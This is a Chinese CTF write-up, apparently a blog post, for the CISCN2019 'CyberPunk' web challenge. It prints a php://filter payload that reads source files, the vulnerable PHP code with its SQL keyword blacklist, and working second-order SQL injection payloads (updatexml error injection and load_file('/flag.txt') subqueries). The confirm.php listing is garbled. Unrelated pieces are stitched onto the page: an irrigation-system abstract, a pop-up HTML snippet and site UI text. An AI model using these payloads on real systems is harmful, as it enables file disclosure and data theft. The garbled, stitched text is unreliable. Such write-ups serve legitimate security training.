[CISCN2019 华北赛区 Day1 Web5]CyberPunk 1

题目分析

功能点分析

在这里插入图片描述
看到查询界面,第一时间想到了xss,经过测试存在xss,但没用
然后想到了sql注入,注册的时候在地址的位置输入一个单引号,再点击修改收货地址的时候报错(为什么直接测地址的输入框呢?纯第六感)
在这里插入图片描述
将报错注入的payload写上去,并没有成功读到内容,猜测变量应该是在sql语句中的位置不对

伪协议读取源码

右键查看页面源代码
在这里插入图片描述
发现一个file参数,尝试伪协议读取代码

payload:?file=php://filter/read=convert.base64-encode/resource=index.php

读取成功,base64解码后得到源代码
在这里插入图片描述
然后又分别读取了以下页面的代码

search.php

change.php

delete.php

confirm.php

search.php

<?php

require_once "config.php"; 

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        if(!$row) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "<p>姓名:".$row['user_name']."</p><p>, 电话:".$row['phone']."</p><p>, 地址:".$row['address']."</p>";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

change.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

delete.php

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){ 
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $result = $db->query('delete from `user` where `user_id`=' . $row["user_id"]);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单删除成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}
?>

confirm.php

php

require_once config.php;
var_dump($_POST);

if(!empty($_POST[user_name]) && !empty($_POST[address]) && !empty($_POST[phone]))
{
    $msg = '';
    $pattern = 'selectinsertupdatedeleteandorjoinlikeregexpwhereunionintoload_fileoutfilei';
    $user_name = $_POST[user_name];
    $address = $_POST[address];
    $phone = $_POST[phone];
    if (preg_match($pattern,$user_name)  preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = select  from `user` where `user_name`='{$user_name}' and `phone`='{$phone}';
        $fetch = $db-query($sql);
    }

    if($fetch-num_rows0) {
        $msg = $user_name.已提交订单;
    }else{
        $sql = insert into `user` ( `user_name`, `address`, `phone`) values( , , );
        $re = $db-prepare($sql);
        $re-bind_param(sss, $user_name, $address, $phone);
        $re = $re-execute();
        if(!$re) {
            echo 'error';
            print_r($db-error);
            exit;
        }
        $msg = 订单提交成功;
    }
} else {
    $msg = 信息不全;
}

代码分析

先丢到代码审计系统里边自动审计一下
在这里插入图片描述
显示change中可能存在sql注入

$sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];

去掉双引号的sql语句为

update `user` set `address`='.$address.', `old_address`='.$row['address'].' where `user_id`=.$row['user_id'];

代码中将$use_name和$number进行了过滤,没有对$address进行过滤,可以对该参数进行构造
有两种思路
1、使用报错函数,注册的时候构造address字段,点击修改信息时,会调用注册时输入的address的内容,从而产生二次注入
2、修改订单时使用子查询给address赋值,然后点击查询订单也可以得到我们想要的信息

解法一

报错函数的位置在where后面,构造payload

payload:1' where `user_id`=updatexml(1,concat(0x7e,database(),0x7e),1)#

在这里插入图片描述
注册完成后点击修改订单,输入姓名、电话后点击提交,注入成功
在这里插入图片描述
按照正常思路,接下来爆破库名、表名、字段名,然后得到flag
然而,本题的flag在flag.txt文件中(呜呜红温了)
同样的操作方法

payload:1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,30)),0x7e),1)#

在这里插入图片描述
这个报错函数只显示30位,再查询后面几位

payload:1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),31,60)),0x7e),1)#

在这里插入图片描述

解法二

先看payload

payload:address=',`address`=(select(load_file("/flag.txt")))#

构造后的sql语句

原查询语句:update `user` set `address`='.$address.', `old_address`='.$row['address'].' where `user_id`=.$row['user_id'];
构造后语句:update `user` set `address`='',`address`=(select(load_file("/flag.txt")))#

通过子查询,将所有的address全部赋值为我们要查询的内容,然后通过查询订单得到内容
提交一个正常的订单,然后在修改订单界面输入payload,点击修改订单在这里插入图片描述
然后点击查询订单在这里插入图片描述
在这里插入图片描述

  • 15
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
自动控制节水灌溉技术的高低代表着农业现代化的发展状况,灌溉系统自动化水平较低是制约我国高效农业发展的主要原因。本文就此问题研究了单片机控制的滴灌节水灌溉系统,该系统可对不同土壤的湿度进行监控,并按照作物对土壤湿度的要求进行适时、适量灌水,其核心是单片机和PC机构成的控制部分,主要对土壤湿度与灌水量之间的关系、灌溉控制技术及设备系统的硬件、软件编程各个部分进行了深入的研究。 单片机控制部分采用上下位机的形式。下位机硬件部分选用AT89C51单片机为核心,主要由土壤湿度传感器,信号处理电路,显示电路,输出控制电路,故障报警电路等组成,软件选用汇编语言编程。上位机选用586型以上PC机,通过MAX232芯片实现同下位机的电平转换功能,上下位机之间通过串行通信方式进行数据的双向传输,软件选用VB高级编程语言以建立友好的人机界面。系统主要具有以下功能:可在PC机提供的人机对话界面上设置作物要求的土壤湿度相关参数;单片机可将土壤湿度传感器检测到的土壤湿度模拟量转换成数字量,显示于LED显示器上,同时单片机可采用串行通信方式将此湿度值传输到PC机上;PC机通过其内设程序计算出所需的灌水量和灌水时间,且显示于界面上,并将有关的灌水信息反馈给单片机,若需灌水,则单片机系统启动鸣音报警,发出灌水信号,并经放大驱动设备,开启电磁阀进行倒计时定时灌水,若不需灌水,即PC机上显示的灌水量和灌水时间均为0,系统不进行灌水。
A: <html> <head> <title>Cyberpunk Pop-up</title> <style> body { background-color: #141A2F; font-family: 'Roboto Mono', monospace; color: #8C8C8C; } .container { width: 100%; height: 100vh; display: flex; justify-content: center; align-items: center; } .button { outline: none; border: none; background-color: #7F5AF0; color: #E5E5E5; font-size: 2.5rem; padding: 1.5rem 3.5rem; border-radius: 0.5rem; cursor: pointer; box-shadow: 0 0.25rem 0.5rem rgba(0,0,0,0.1); transition: all 0.2s ease-in-out; } .button:hover { box-shadow: 0 0.5rem 1rem rgba(0,0,0,0.2); transform: translateY(-2px); } .overlay { position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; background-color: rgba(0,0,0,0.75); display: flex; justify-content: center; align-items: center; } .pop-up { background-color: #1B1C28; width: 40%; padding: 3.5rem 5.5rem; border-radius: 0.75rem; box-shadow: 0 0.5rem 1rem rgba(0,0,0,0.2); text-align: center; } h2 { font-size: 2.5rem; margin-bottom: 2rem; } p { font-size: 1.5rem; color: #8C8C8C; margin-bottom: 3rem; } .close { position: absolute; top: 1.5rem; right: 1.5rem; font-size: 2rem; color: #8C8C8C; cursor: pointer; } .close:hover { color: #E5E5E5; } </style> </head> <body> <div class="container"> <button class="button" onclick="openPopUp()">Open Pop-Up</button> <div class="overlay" id="overlay"> <div class="pop-up"> <span class="close" onclick="closePopUp()">✕</span> <h2>Hello World!</h2> <p>This is a cyberpunk styled pop-up.</p> </div> </div> </div> <script> function openPopUp() { document.getElementById("overlay").style.display = "flex"; } function closePopUp() { document.getElementById("overlay").style.display = "none"; } </script> </body> </html>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值